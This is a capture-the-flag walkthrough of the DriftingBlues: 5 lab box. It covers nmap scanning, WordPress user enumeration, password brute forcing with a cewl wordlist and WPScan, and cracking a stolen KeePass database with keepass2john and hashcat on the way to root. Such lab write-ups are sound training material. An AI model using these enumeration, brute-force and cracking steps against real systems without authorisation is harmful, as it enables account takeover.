Box info:
Name: DriftingBlues: 5
OS: Linux
Rated Difficulty: 🟩🟩(easy)
====================================================================
Using nmap we've found 2 open ports:
$ sudo nmap -sC -sV 192.168.0.10 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 09:56 EEST Nmap scan report for 192.168.0.10 Host is up (0.00036s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA) | 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA) |_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-generator: WordPress 5.6.2 |_http-server-header: Apache/2.4.38 (Debian) |_http-title: diary – Just another WordPress site MAC Address: 08:00:27:51:13:12 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Immediately we can see this is a wordpress website. Let's use WPScan to find the users:
$ wpscan --url http://192.168.0.10/ --enumerate u [i] User(s) Identified: [+] abuzerkomurcu | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://192.168.0.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] satanic | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] gill | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] collins | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] gadd | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
$ cewl -d 2 -m 4 -w passwd --with-numbers http://192.168.0.10/index.php
$ wpscan --url http://192.168.0.10/ --usernames users --passwords passwd [!] Valid Combinations Found: | Username: gill, Password: interchangeable
Looks like we don't have administrator privileges, so we can't do much. Inside the media tab there is an image that is not listed in any of the posts.
Shell as user gill:
Inside gill's home directory there is a a file with .kdbx extension.
Send the file to your machine and use JohnTheRipper's option keepass2john to get a hash format from it so you can 'crack' it using hashcat.
keepass2john keyfile.kdbx > hash
Now use hashcat (I used hashcat on windows):
.\hashcat64.exe -m 13400 .\hash .\rockyou.txt
The password from hashcat:
Open Keepass2 (you can install is using the apt utilitary) and add the masterpassword that you just 'cracked':
Shell as root:
Now read the rootcreds.txt file and use the password inside to get a shell as root.
Comments
Post a Comment